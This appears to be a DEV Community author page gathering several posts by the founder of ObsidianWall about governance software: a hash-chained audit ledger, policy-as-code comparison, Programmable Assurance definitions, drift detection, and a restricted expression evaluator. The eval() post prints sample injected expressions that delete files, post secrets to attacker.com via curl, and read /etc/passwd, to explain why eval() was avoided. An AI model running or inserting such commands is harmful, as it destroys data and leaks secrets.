DEV Community: Aisha

Designing a Tamper-Evident Audit Ledger (Without Blockchain)

Aisha — Thu, 23 Jul 2026 09:00:00 +0000

We build governance software — tools that decide whether an infrastructure change should be allowed to deploy. Every decision gets logged locally so you can go back later and figure out why something was allowed, or who signed off on it.

Here's a question that logging by itself doesn't answer though: how do you actually know the log hasn't been quietly edited after the fact?

Turns out lots of systems log events. Way fewer make those logs something you can actually trust.

What we started with

Nothing fancy. One table for decisions. Then separate tables for overrides, approvals, and outcomes, because those felt like different things at the time.

It worked fine for a while, honestly.

Where it started falling apart

The problem showed up once we needed to add a new kind of event. Three tables meant three schemas to touch every time. Drift detection? New table. Evidence re-verification? Another one. It wasn't unworkable, just annoying in a way that kept getting worse.

Nothing stopped a row from being edited directly. If someone flipped an approved flag from false to true straight in the database, nothing would notice or care. The log recorded what happened. It didn't protect any of it.

The queries on top of it had real bugs. A LEFT JOIN between decisions and their follow-up events meant a decision with more than one follow-up got counted twice inside a SUM() — we actually saw a denial-rate report print 101.2%, which, obviously, isn't a real number. Separately, a migration that added a few new columns via ALTER TABLE left every row that existed before that migration with NULL in them, because ALTER TABLE ADD COLUMN doesn't backfill anything. Old records just quietly dropped out of reports that depended on those columns. No error. Just wrong numbers sitting there looking normal.

None of this was exotic. It's what happens to a table that grows one feature at a time without anyone stepping back to look at the shape of it.

What we changed

We merged the three event tables into one append-only history table. Every subsequent thing that happens to a decision — someone requesting an override, someone approving it, drift getting detected — becomes a new row. Nothing ever gets updated in place.

CREATE TABLE governance_history (
    history_id           TEXT PRIMARY KEY,
    record_id              TEXT NOT NULL,
    history_category          TEXT NOT NULL,  -- override | approval | outcome | drift
    history_action              TEXT NOT NULL,  -- requested | approved | denied | detected
    history_hash                   TEXT NOT NULL,
    prev_history_hash                 TEXT,       -- chains to the previous entry
    created_at                          TEXT NOT NULL
);

Category plus action, instead of one flat event-type string. Every new event kind we've added since — drift, evidence, whatever comes next — just fits into those two columns. Querying "every override-related thing that ever happened" is WHERE history_category = 'override'. No growing list of special-cased event names to keep updating.

Every row hashes to the row before it. history_hash is a SHA-256 of that row's data, and prev_history_hash points at the previous row's hash for the same record — basically the same trick git uses for commits. Touch an old row, and every hash after it stops lining up.

We've been careful to call this tamper-evident, not cryptographically signed, because those are genuinely different claims. What we built tells you whether something changed after the fact. It doesn't prove who was allowed to change it, and it's not a signature. For a governance tool specifically, that distinction felt worth being precise about.

Why any of this matters

If a decision in your audit trail can be edited with nobody the wiser, it's not really evidence anymore — it's just something someone typed. The whole point of a trail like this is that someone with zero context can look at it later and trust it without having to trust whoever ran the system in the first place. A log you can quietly rewrite doesn't get you that. An append-only, hash-chained one does.

A few things we'd tell ourselves earlier

ALTER TABLE ADD COLUMN does not backfill anything. Every row that existed before you ran that migration has NULL in the new column, forever, unless you go write a backfill pass yourself. We found this the annoying way — a report quietly excluding forty-some records and nobody noticing until the numbers looked slightly off.

Watch out for LEFT JOIN combined with SUM(CASE WHEN...). Any join that can multiply rows will inflate a sum sitting on top of it. COUNT(DISTINCT ...) on the actual thing you're counting is usually what you want instead.

A running list of schema migrations needs its own discipline. We added a _MIGRATIONS list early on and then just... forgot to add to it the next few times we touched the schema, because nothing forced us to remember. Cheap fix. The habit was the actual problem.

Say exactly what you built. Tamper-evident and cryptographically signed sound similar and aren't. One tells you something changed. The other tells you who was allowed to change it. Worth being precise, especially if anyone's going to rely on the claim later.

Curious if anyone else has built something like this without pulling in a full ledger/blockchain dependency. Did you land on hash-chaining too, or take a different path entirely?

Policy-as-Code Gives You Pass/Fail. Governance Needs More Than That.

Aisha — Tue, 30 Jun 2026 10:00:00 +0000

Every time I show someone ObsidianWall Verdict, the first question is some version of: "how is this different from OPA?"

It is a fair question. So here is the honest answer — not a sales pitch, an architectural one.

Policy-as-Code does one thing extremely well

Open Policy Agent, HashiCorp Sentinel, Checkov — these tools evaluate structured data against a policy at a specific point in time and return pass or fail.

Input:   Terraform plan JSON
Policy:  Rego / Sentinel policy file
Output:  true / false

Fast. Deterministic. Battle-tested at scale. If you need raw evaluation logic, these are mature, capable tools. I am not arguing against them.

Where it stops being enough

Three things break down the moment policy evaluation has to operate inside a real organization instead of an isolated CI step.

Binary rigidity. A policy engine returns pass or fail. There's no native concept of "this needs approval but can proceed" versus "this is a hard stop." A mission-critical hotfix that trips a minor tagging rule just breaks the pipeline. No nuance.

No human context. The engine can't tell you who has authority to override a rule, why they did, or whether the right person signed off. An engineer drops a #ignore comment in code and that decision typically vanishes — no structured record of who made it or why.

Point-in-time blindness. Policy-as-Code checks a static file before deployment. It has zero visibility into whether the deployment actually succeeded or what the infrastructure looks like five months later. No reality evidence. No way to verify deployed state still matches what was authorized.

What I built instead

Verdict — ObsidianWall's evaluation engine — wraps the policy mechanic in four things a complete governance system actually needs.

Five-level typed decisions, not pass/fail:

ALLOW
ALLOW_WITH_NOTIFICATION
ALLOW_WITH_APPROVAL_REQUIRED
DENY_WITH_OVERRIDE
DENY

A failed condition doesn't have to mean a broken pipeline. It can mean a Slack notification to the budget owner, a required sign-off from security, or an explicit override path with a named authorized role.

Named accountability on every decision. Every override, approval, and exception gets written to an immutable audit artifact with a named person, a named policy, and a named timestamp. That's the difference between a buried #ignore comment and a record an auditor can actually review six months later.

Technical Risk and Governance Risk as separate dimensions. A deployment can score Technical Risk 0 and Governance Risk Critical at the same time. A policy engine alone can't express that distinction — it only knows if the rule passed. Whether something is technically misconfigured and whether it violates an organizational obligation are genuinely different questions with different owners.

Pre-deployment and post-deployment, working together. Verdict evaluates before deployment. Sentinel verifies after. Together they check that operational reality stayed aligned with what was authorized — a gap point-in-time evaluation can't see by design.

The actual relationship

              Human Intent
                   │
                   ▼
         ┌──────────────────┐
         │   ObsidianWall    │
         │  Governance Layer │
         │                   │
         │  Typed decisions  │
         │  Accountability   │
         │  Risk separation  │
         │  Post-deploy check│
         └─────────┬─────────┘
                   │
                   ▼
         ┌──────────────────┐
         │ Policy Evaluation │
         │  Mechanic Layer   │
         │                   │
         │  OPA / Rego, or   │
         │  ObsidianWall's   │
         │  native YAML      │
         └─────────┬─────────┘
                   │
                   ▼
          Terraform Plan /
          CloudFormation

A policy engine could sit underneath ObsidianWall as the evaluation mechanic — they're not mutually exclusive. ObsidianWall's native format is YAML rather than Rego, by design, to lower the barrier for security and platform teams who aren't policy-DSL specialists. But the architectural point stands regardless of which evaluation mechanic you use: ObsidianWall orchestrates accountability, risk separation, and verification. Policy engines provide the evaluation primitive underneath.

When you'd actually want which

Stick with raw Policy-as-Code if you need maximum flexibility in policy logic, your team already knows Rego, you only need pass/fail with no accountability layer, or post-deployment drift isn't in scope for what you're governing.

Reach for ObsidianWall if you need typed decisions beyond pass/fail, named accountability for overrides, compliance coverage mapping (HIPAA, SOC 2, CIS v8, NIST AI RMF), separation between technical misconfiguration and governance violations, or evidence that still holds up in an audit six months out.

Policy-as-Code gives you the technical ability to check a file.

What I'm trying to build gives you the institutional guarantee that the decision was accountable, the risk was understood in both technical and governance terms, the right people were notified, and the deployed reality still matches what was authorized.

Different questions. Not a competition.

ObsidianWall Verdict is open source. GitHub · PyPI · pip install obsidianwall-verdict

Why I Rewrote the Definition of Programmable Assurance

Aisha — Tue, 23 Jun 2026 10:31:14 +0000

Intent should align with outcomes.

It sounds obvious.

Yet most organizations have no reliable way to verify that it does.

Policies exist.

Controls exist.

Accountability often does not.

Evidence is fragmented.

The gap between intent and outcomes is where governance failures live.

Modern organizations run on software.

Infrastructure is programmable.

Identity is programmable.

Security is programmable.

AI systems are programmable.

Governance is not.

Programmable Assurance is the discipline of ensuring it is.

About three weeks ago I published a definition of Programmable Assurance that I was genuinely proud of.

Then I spent three weeks building, shipping, watching an AI independently discover and classify what I was building without being told what it was, and having a lot of uncomfortable conversations about what governance actually means to people who are not engineers.

I realized the definition was too small.

Not wrong. Too small.

The original definition described the mechanism.

The new definition describes the outcome.

Here is what I wrote in June:

"The discipline of expressing organizational intent as executable, verifiable, explainable, and continuously enforceable governance logic."

When I said that to engineers, they understood it immediately.

When I said it to a Chief Risk Officer, she heard "developer problem."

When I said it to a General Counsel, he asked if it was a compliance scanner.

That is not a communication problem.

That is a definition problem.

The original definition explained how Programmable Assurance works technically.

It did not explain what problem it solves organizationally.

The New Definition

Programmable Assurance is the discipline of continuously aligning intent with outcomes through executable governance, accountability, evidence, and feedback.

For those who want the full scope boundary:

Programmable Assurance is the discipline of making governance intent executable, continuously enforceable, and accountable — governing the organizational decisions, systems, and responses through which intent becomes reality, with evidence and feedback that close the gap between the two.

The shorthand explains the outcome.

The canonical definition explains the mechanism.

Both describe the same idea.

The problem Programmable Assurance solves is not fundamentally a technical problem.

It is an organizational one.

Why the Original Definition Was Too Narrow

The original definition treated intent as an engineering design pattern.

YAML conditions.

Policy DSL files.

Terraform plans.

That framing works when you are governing infrastructure.

It breaks the moment someone asks whether Programmable Assurance applies to an NDA policy, a procurement approval, or a board-level risk acceptance.

Those have no pipeline.

No condition expression.

No deployment.

But they still have intent.

They still have decisions.

They still have accountability.

And when they fail, someone still needs evidence of what happened.

The original definition excluded those cases by accident.

I had been so focused on the infrastructure use case — which is where my own implementation starts — that I wrote a definition for a product instead of a category.

That mistake compounds.

If the category definition is too narrow, every future expansion requires re-educating the market.

I would rather define it correctly once.

What Programmable Assurance Actually Argues For

Programmable Assurance is not a topology.

It is not a deployment model.

It is not a governance architecture.

It is a behavioral argument.

Whatever governance you have — wherever it lives — it should behave four ways.

Intent Must Be Executable

Governance that exists only as a document is aspiration, not governance.

Intent becomes governance when it can influence, constrain, verify, or record the behavior it governs.

For a security policy that might be a condition that evaluates before a deployment executes.

For a procurement policy it might be an approval gate.

For a board-level risk acceptance it might be a signed ledger entry recording who accepted the risk and when.

The form changes.

The requirement does not.

Enforcement Must Be Continuous

Annual audits tell you what happened.

They do not prevent what happens next.

By the time an auditor reviews a control, the violation has already occurred.

The breach has already happened.

The bill has already arrived.

Real governance operates at the speed of change.

It runs whenever relevant decisions occur.

Not months later.

Every Decision Must Be Accountable

This one is personal.

I have watched security teams get blamed for outcomes created by decisions that nobody documented.

The risk was raised.

Leadership declined to act.

The record disappeared into email threads.

Years later, when something went wrong, nobody could reconstruct who decided what.

Accountability is not blame.

Accountability is the record that connects intent to decision to outcome.

Without that record, governance becomes theater.

With it, governance becomes defensible.

Outcomes Must Feed Back Into Intent

Governance that does not learn eventually becomes wrong.

Organizations change.

Risk profiles change.

Regulations change.

Business priorities change.

A governance system that cannot observe outcomes has no mechanism for knowing when its assumptions no longer match reality.

The feedback loop is what keeps intent aligned with outcomes over time.

Without feedback, governance stagnates.

With feedback, governance improves.

The Scope Boundary

Programmable Assurance applies wherever organizational intent can be translated into governable decisions, evidence, accountability, and feedback.

It does not govern human free will.

It governs the systems and decisions that respond to, record, authorize, and account for human behavior.

A harassment incident cannot be prevented by software.

But the investigation workflow, the evidence chain, the accountability record, and the organizational response absolutely can be governed.

Those systems matter.

And they are governable.

The Founding Insight

The insight did not come from a single incident.

It emerged repeatedly across every layer I operated in.

Because of the nature of my work, I was often responsible for the entire lifecycle.

I helped establish intent.

I translated that intent into policies and controls.

I implemented those controls across cloud platforms and security systems.

I operated the environments those controls governed.

I investigated the outcomes when things failed.

And I was responsible for the financial consequences when they did.

Most people experience only one layer of that process.

An engineer sees implementation.

A compliance officer sees policy.

A security analyst sees findings.

A finance team sees costs.

I was moving between all of them.

And from every layer, I kept encountering the same failure in a different form.

As an engineer, I saw tools that reported what had already gone wrong.

The cloud bill arrived after the spend.

The breach notification arrived after the incident.

The compliance finding arrived after the audit.

Systems designed to monitor outcomes rather than prevent them.

As a security practitioner, I watched engineers encounter controls they did not understand.

A policy blocks a deployment.

The engineer sees friction.

They find a workaround.

The control fails not because it was wrong—but because it never explained why it existed.

Nobody told them the business reason, the regulatory obligation, or the financial consequence attached to disabling it.

A control that is enforced but not understood creates friction.

A control that is enforced and understood creates alignment.

When I was starting out, I wished someone had explained the why behind every enforcement.

That MFA was not just a configuration checkbox.

It was a regulatory obligation with financial exposure attached.

That understanding would have made me a better engineer faster.

It would have made compliance drift less likely.

As a policy author implementing controls in Microsoft Purview, Azure Policy, and Entra ID, I stopped one afternoon and asked a simple question:

Will any engineer who encounters this control know why it exists?

The answer was no.

And I realized something larger.

The intent was in SharePoint.

The policy was in Azure Policy.

The enforcement was in Entra ID.

The evidence was in Azure Monitor.

The budget controls were somewhere else entirely.

None of those systems had any awareness of the others.

No shared vocabulary.

No shared evidence.

No shared feedback.

Each system saw only its own slice of the picture.

Different systems.

Different layers.

Different problems.

The same underlying failure.

Organizations define intent in one place,

execute it somewhere else,

measure it somewhere else,

and explain it nowhere.

That is Governance Fragmentation.

That is the Intent-Reality Gap.

That is the problem that kept appearing from every angle, no matter which layer I was operating in.

The cloud bill was a symptom.

The bypassed control was a symptom.

The policy nobody could find was a symptom.

The risk acceptance nobody could reconstruct was a symptom.

The disease was always the same:

intent and outcomes were disconnected.

Programmable Assurance closes that gap.

Not with more policies.

Not with better dashboards.

With systems that connect intent to outcomes—and carry that intent all the way to the execution layer where it can actually change behavior—with evidence that proves it did.

The vision existed long before I had language for it.

The definition finally says it in a way that scales with it.

Aisha Ibrahim. is the founder of ObsidianWall, building infrastructure for Programmable Assurance. obsidianwall.com

If you missed the original definition article, it is here.

I Built a Pre-Deployment Governance Tool. Here's What It Couldn't Answer.

Aisha — Mon, 08 Jun 2026 09:30:00 +0000

By Aisha Ibrahim
Founder, ObsidianWall

About three months into building ObsidianWall Verdict, I ran into a question I kept not being able to answer.

Verdict works well at what it does. You give it a Terraform plan and a policy, and it tells you whether the deployment should proceed — risk score, condition trace, full audit artifact. Deterministic. Explainable. Fast.

verdict evaluate \
  --plan   terraform_plan.json \
  --policy policies/cost/basic_budget.yaml \
  --role   engineer

DENY_WITH_OVERRIDE. Risk 75/100. Budget exceeded.

Clean output. Clear decision.

Except I kept thinking: then what?

The deployment got blocked. Did someone override it? Did they just deploy from a different terminal? Did the cost actually come in under budget when they eventually ran it? Did the policy even matter?

Verdict had no idea. It made a decision and moved on. That's a policy engine, not a governance system.

The gap nobody talks about

Most policy-as-code tools stop at pass/fail. Check runs, result comes back, pipeline continues or doesn't. That's where the category ends for most teams.

But the whole premise of what I'm building — Programmable Assurance — is that enforcement alone isn't assurance. Assurance means you can demonstrate that reality stayed aligned with intent over time. Not just at the moment of deployment. After it.

So I started building Sentinel.

Verdict's question: should this deployment be allowed?
Sentinel's question: did reality stay aligned after the decision was made?

Those sound similar. They're not.

The design problem I didn't see coming

My first draft of Sentinel required passing --policy on every scan:

verdict sentinel scan \
  --plan   terraform_plan.json \
  --policy policies/cost/basic_budget.yaml

Explicit. Works fine. Also wrong.

The problem isn't the UX. The problem is what question it's asking. When you require --policy, you're asking: which policy file should I use? But when you run Sentinel, the real question is: which governance decision am I verifying against?

Those are different questions. One is filesystem-centric. The other is governance-centric.

If a policy file gets moved, renamed, or updated between Verdict's evaluation and when Sentinel runs, you lose the connection. You're no longer comparing against the original decision — you're comparing against whatever the current policy says. That's not reality verification. That's just running Verdict twice.

The fix was small but it mattered architecturally. Store the policy path inside the governance decision record at evaluation time:

record_decision(
    result=result,
    plan_path=plan,
    policy_path=policy,  # now stored in decisions table
)

Now Sentinel loads the comparison decision from governance history, reads the stored policy_path, and uses that to re-evaluate the current plan. No --policy flag required.

verdict sentinel scan --plan terraform_plan.json

The governance record is the source of truth. Not the filesystem. The decision ID is the stable reference — not a file path that might change.

What the output actually looks like

When nothing has drifted:

────────────────────────────────────────────────────────────────────────
  ObsidianWall Sentinel — Drift Detection Report
────────────────────────────────────────────────────────────────────────

  Decision:  5a6f5869  (2026-06-08 05:55:04)
  Policy:    basic_budget_verdict
  Plan:      samples/terraform_plan.json

  Decision Comparison
────────────────────────────────────────────────────────────────────────
  Previous:  ⚠️  DENY_WITH_OVERRIDE    risk: 75/100
  Current:   ⚠️  DENY_WITH_OVERRIDE    risk: 75/100

  Condition Comparison
────────────────────────────────────────────────────────────────────────
  budget_check    ✗ FAIL → ✗ FAIL    unchanged

  Outcome
────────────────────────────────────────────────────────────────────────
  ✅ No drift detected
  Recorded: no_drift

Pay attention to what gets recorded: no_drift. Not deployment_success.

That distinction is intentional. Sentinel at this stage has no cloud API access. It cannot know whether a deployment actually ran or succeeded. It only knows whether the governance state of the plan matches the previous evaluation. So it records what it can actually observe.

deployment_success would be a claim about what happened in production. Sentinel has no evidence for that claim. no_drift is a claim about governance state. That it can verify directly.

Small distinction. But this kind of precision is what separates a tool that's honest about its own limitations from one that manufactures confidence.

Three evidence streams, not one

Building Sentinel forced me to think more clearly about the different kinds of evidence a governance system actually produces.

Decision Evidence is what Verdict creates — what was decided, why, with what risk score, based on which conditions.

Reality Evidence is what Sentinel creates — whether the governance state held after the decision was made. Did the plan drift? Did new failures appear?

Operational Evidence is what neither of them creates yet — whether the deployment actually succeeded or caused an incident in production. That requires cloud API integration and comes later.

Most governance tools collapse all three into a single log entry. "Passed." "Failed." Full stop.

Keeping them separate matters because they answer genuinely different questions. Once you have all three, you can start asking things that governance tooling almost never supports: Did the policies that denied deployments actually prevent incidents? Are there controls that get overridden constantly without any subsequent problems — suggesting they're miscalibrated? Which policies generate friction without generating safety?

That's governance intelligence. Not governance logging.

Where it stands

Verdict is live and open source. Sentinel MVP shipped this week. The audit output is starting to show evidence from multiple streams in one place:

Deployment Outcomes

no_drift              2
deployment_success    2

Two outcomes. Small number. But real evidence — not assumed outcomes, not synthetic telemetry. As that history grows, the insights engine stops guessing and starts reasoning from actual data.

The repo is at github.com/ObsidianWall/obsidianwall-verdict if you want to look at the implementation or try it against your own Terraform plans.

Defining Programmable Assurance

Aisha — Mon, 01 Jun 2026 08:07:00 +0000

By Aisha Ibrahim
Founder, ObsidianWall — building programmable
governance infrastructure for cloud and AI systems.

For decades, organizations have relied on policies, standards, controls, audits, and governance processes to create assurance.

Assurance answers a simple question:

How do we know that what we intended is actually happening?

Traditionally, assurance has been manual.

Policies are written in documents.

Controls are implemented separately by engineering teams.

Auditors review evidence months later.

Exceptions are tracked in spreadsheets.

Approvals occur through emails and ticketing systems.

The result is a governance gap between intent and reality.

Organizations define what they want, but they often lack a reliable mechanism to continuously verify that reality matches that intent.

The Problem

Modern organizations operate through software.

Infrastructure is code.

Security controls are code.

Identity systems are code.

AI systems are code.

Yet governance remains largely document-driven.

This creates a fundamental mismatch.

Engineering operates at machine speed.

Governance operates at human speed.

The larger and more complex an organization becomes, the larger this gap grows.

What Is Programmable Assurance?

Programmable Assurance is the discipline of expressing organizational intent as executable, verifiable, explainable, and continuously enforceable governance logic.

Instead of relying solely on written policies and periodic audits, assurance becomes programmable.

Intent becomes code.

Controls become executable.

Decisions become deterministic.

Evidence becomes continuously generated.

Accountability becomes traceable.

Assurance is no longer a retrospective activity.

It becomes a runtime capability.

Core Principles

Programmable Assurance is built upon five principles.

1. Intent Must Be Executable

Policies should not exist solely as documents.

Organizational intent must be represented in a form that systems can evaluate automatically.

Examples include:

Cost governance
Security requirements
Compliance obligations
Identity controls
Data governance requirements
AI governance standards
Resilience objectives

2. Decisions Must Be Deterministic

Governance decisions should be explainable and reproducible.

Given the same inputs and policies, the system should produce the same outcome every time.

Determinism creates trust.

3. Assurance Must Be Continuous

Traditional audits occur periodically.

Programmable Assurance operates continuously.

Every proposed change can be evaluated before implementation.

Every decision can generate evidence.

Every exception can be recorded.

4. Governance Must Be Explainable

Organizations need more than decisions.

They need reasoning.

A governance system should answer:

What decision was made?
Why was it made?
Which conditions influenced the outcome?
What evidence supported the decision?
Who approved exceptions?

Explainability transforms governance from a black box into an accountable process.

5. Accountability Must Be Programmable

Governance is ultimately about accountability.

Different stakeholders own different risks:

Engineers own implementation.
Security teams own security risk.
Budget owners own financial risk.
Compliance teams own regulatory risk.
Executives own business risk.

Programmable Assurance routes governance decisions to the stakeholders responsible for those risks while preserving operational velocity.

Beyond Policy-as-Code

Programmable Assurance is not merely Policy-as-Code.

Policy-as-Code focuses on expressing rules as executable logic.

Programmable Assurance encompasses a broader lifecycle:

Intent → Policy → Evaluation → Decision → Explainability → Accountability → Evidence → Continuous Assurance

Policy execution is only one component.

Assurance is the outcome.

Why This Matters

As organizations become increasingly software-defined and AI-driven, governance can no longer remain document-centric.

Organizations require systems capable of continuously translating intent into enforceable outcomes.

Programmable Assurance provides a framework for achieving that goal.

It transforms governance from static documentation into an active operational capability.

The future of governance is not more policies. The future of governance is making assurance programmable.

Why I Didn't Use eval() in ObsidianWall's Policy Engine — And What I Built Instead

Aisha — Mon, 25 May 2026 13:00:00 +0000

By Aisha Ibrahim
Founder, ObsidianWall

When you're building a tool that evaluates policy expressions like this:

(current_spend + estimated_cost) <= budget.amount

the obvious implementation is a single line of Python:

result = eval(expression, context)

It works. It's clean. It takes five minutes to write.

I didn't use it. Here's exactly why — and what I built instead.

What ObsidianWall Is

Before getting into the technical decision, some context.

ObsidianWall is a programmable assurance platform — a system for encoding human governance intent as executable policy, evaluating it deterministically, and enforcing it transparently with full audit traceability.

The core doctrine of the platform is this:

AI may advise. AI may explain. AI may optimize. AI may recommend.
AI may NOT authoritatively govern.

That single principle drives every architectural decision in the platform, including the one this article is about.

ObsidianWall Verdict is the first executable built on that platform — a deterministic pre-deployment infrastructure governance engine. It evaluates infrastructure plans against policy before deployment happens, produces an enforcement decision, and generates an audit-grade trace of exactly how that decision was reached.

The expression evaluator is at the heart of how Verdict makes those decisions. And that is where eval() became the wrong answer.

The Problem With eval() in a Governance Engine

eval() executes arbitrary Python expressions. That sentence sounds harmless until you think carefully about what "arbitrary" means in the context of a system that:

Accepts policy files written by humans
Processes infrastructure plans from CI/CD pipelines
Makes enforcement decisions that block or allow deployments
Produces audit records that compliance teams rely on

In that context, "arbitrary" means any of the following become valid inputs to your evaluator:

# Someone writes this as a policy condition expression:
"__import__('os').system('rm -rf /')"

# Or this:
"__import__('subprocess').call(['curl', 'http://attacker.com', '-d', secrets])"

# Or something subtler:
"open('/etc/passwd').read() == 'root'"

eval() executes all of them without question.

The standard advice is to sandbox it by removing builtins:

result = eval(expression, {"__builtins__": {}}, context)

This is not sufficient. Python's object model provides paths back to dangerous capabilities through class hierarchies even with builtins removed. Security researchers have broken every Python eval sandbox ever published. This is a fundamentally unsolved problem — not an engineering challenge you can outthink with a clever enough sandbox.

But the security problem is not even the most important reason to reject eval().

The Real Problem: Auditability

A governance engine is not a calculator. It is a system that makes enforcement decisions about infrastructure and produces audit records that humans, compliance teams, and regulators rely on.

For that system to be trustworthy, every decision must be:

Deterministic — the same input always produces the same output, without exception
Auditable — a human reading the trace can verify the decision independently without running any code
Bounded — the complete set of things the evaluator can do is finite, known, and describable

eval() fails all three requirements.

It is non-deterministic by design — side effects, I/O, and state mutations are all possible. It is not auditable — you cannot fully describe its behavior surface without describing all of Python. It is unbounded — it can do anything Python can do.

What a governance engine actually needs is not a Python expression evaluator. It needs a restricted expression grammar — a purposefully small language that can only do exactly what policy evaluation requires, and nothing else. The restriction is not a limitation. It is the entire point.

The Solution: A Deterministic Expression Grammar

ObsidianWall Verdict's condition evaluator supports a deliberately minimal grammar:

Comparison operators:   <=   >=   <   >   ==
Arithmetic operations:  addition  ( a + b )
Operand types:          context keys,  numeric literals

That is the complete grammar. No function calls. No variable assignment. No imports. No string manipulation. No loops. No conditionals beyond the comparison itself.

If an expression requires anything outside this grammar, the evaluator does not attempt to execute it. It raises an error with a clear message. The boundary is explicit, enforced, and fully testable.

This means a policy author can write:

conditions:
  - id: budget_check
    expression: "(current_spend + estimated_cost) <= budget.amount"
    description: "Monthly spend cap enforcement"

And the evaluator resolves it step by step:

Strip cosmetic parentheses
Identify the comparison operator — <=
Split into left side and right side
Resolve left side — current_spend + estimated_cost — by looking up each key in the runtime context and summing them
Resolve right side — budget.amount — by looking up the key in the runtime context
Apply the operator — 100 <= 50.0
Return the result — False

Every step is traceable. Every step is verifiable. A compliance engineer reading the audit output can reconstruct the evaluation manually without running any code. That is what auditability means in practice — not just logging that a decision happened, but making the decision itself independently verifiable.

The Normalization Layer — Bridging Human Intent and Machine Evaluation

There is an architectural subtlety that took real design work to get right.

Governance policies are written by humans in nested, readable structures:

spec:
  parameters:
    budget:
      amount: 50
      period: monthly
      owner: team-alpha

But the deterministic evaluator operates against a flat key-value context. It resolves budget.amount — not nested object traversal, not dynamic attribute access, not recursive dict walking.

The naive solution is to make the evaluator smart about nested structures. That is the wrong solution. It contaminates the evaluator with policy structure knowledge, destroys its determinism guarantees, and makes it significantly harder to audit.

The correct solution is a normalization layer that runs before evaluation — a dedicated component whose only job is to translate human-readable nested policy structures into evaluator-ready flat contexts:

Input:   {"budget": {"amount": 50, "period": "monthly"}}
Output:  {"budget.amount": 50, "budget.period": "monthly"}

After normalization, the evaluator receives a flat context. It resolves budget.amount directly. It never needs to know how the policy was structured. The normalization layer is the bridge — and it is the only place in the system that understands both the policy structure and the evaluation context simultaneously.

The evaluation pipeline becomes:

Raw Policy YAML
      ↓
Canonicalize DSL structure
      ↓
Validate against schema contract
      ↓
Flatten + merge into runtime context     ← normalization layer
      ↓
Restricted expression evaluation         ← deterministic, bounded
      ↓
Decision + immutable audit trace

Each layer has one responsibility. Each layer can be tested independently. Each layer can be audited independently. No layer needs to understand what the others are doing internally.

What This Means for Testing

Because the expression evaluator is a pure function with no side effects and a completely bounded input surface, testing it requires no mocking, no fixtures, and no infrastructure:

def test_blocks_when_budget_exceeded():
    context = {
        "current_spend":  0,
        "estimated_cost": 100,
        "budget.amount":  50.0
    }
    result = evaluate_expression(
        "(current_spend + estimated_cost) <= budget.amount",
        context
    )
    assert result is False


def test_allows_when_within_budget():
    context = {
        "current_spend":  0,
        "estimated_cost": 30,
        "budget.amount":  50.0
    }
    result = evaluate_expression(
        "(current_spend + estimated_cost) <= budget.amount",
        context
    )
    assert result is True


def test_rejects_expression_outside_grammar():
    with pytest.raises(ValueError):
        evaluate_expression(
            "__import__('os').system('ls')",
            {}
        )

A function goes in. A result comes out. You assert the result. No setup. No teardown. No dependencies. That is what happens when you build a pure deterministic function instead of delegating to eval().

The third test is particularly important for a governance engine. The evaluator does not just fail silently on unsupported expressions — it explicitly rejects them. The boundary is enforced, not just hoped for.

The Principle Behind the Decision

The decision not to use eval() is not primarily a security decision, though security is one outcome.

It is a decision about what kind of system ObsidianWall is.

The ObsidianWall doctrine says AI may advise but may not authoritatively govern. The same principle applies to the expression evaluator — it may evaluate exactly what the grammar allows, and nothing else. The restriction is the guarantee. The boundary is the trust.

A governance engine is only useful if the people governed by it trust it. Trust requires transparency. Transparency requires that the system's behavior be fully describable — that an engineer, a compliance officer, or a regulator can read the evaluation trace and verify independently that the decision was correct.

eval() cannot offer that guarantee. A restricted expression grammar can.

The minimal grammar is not a limitation imposed by inability. It is a design statement:

This system does exactly this, and nothing else. You can verify that. We built it that way on purpose.

That is what programmable assurance means.

The Audit Output

When Verdict evaluates a plan and reaches a decision, the audit artifact looks like this:

{
  "decision": "DENY",
  "conditions_passed": false,
  "trace": [
    {
      "condition_id": "budget_check",
      "expression": "(current_spend + estimated_cost) <= budget.amount",
      "result": false,
      "description": "Monthly spend cap enforcement"
    }
  ],
  "input_context": {
    "estimated_cost": 100,
    "current_spend": 0
  },
  "runtime_context": {
    "estimated_cost": 100,
    "current_spend": 0,
    "budget.amount": 50.0,
    "budget.period": "monthly"
  }
}

Two contexts are preserved separately — input_context captures what came in from the infrastructure plan, runtime_context captures the fully normalized state the evaluator actually saw. That separation matters for forensic reconstruction, compliance export, and replay — you can reproduce the exact evaluation state at any point in the future from the audit record alone.

What's Next

This is the first article in a series on the architecture behind ObsidianWall.

The next two cover:

How the enforcer/recommender separation preserves the AI authority boundary — why the system that makes enforcement decisions must be architecturally isolated from the system that generates recommendations, and what happens to governance trust when that boundary is violated.

How programmable assurance differs from reactive governance — why alerting, dashboards, and drift detection are fundamentally different abstractions from deterministic decision systems, and why that difference matters in AI-era infrastructure.

ObsidianWall Verdict is currently in early access.

If you are dealing with infrastructure budget overruns, compliance violations discovered after deployment, or policy drift across engineering teams — Verdict was built for exactly that problem.

Early access: obsidianwall.com

Aisha is the founder of ObsidianWall — a programmable assurance platform for deterministic governance and AI-native operational intelligence.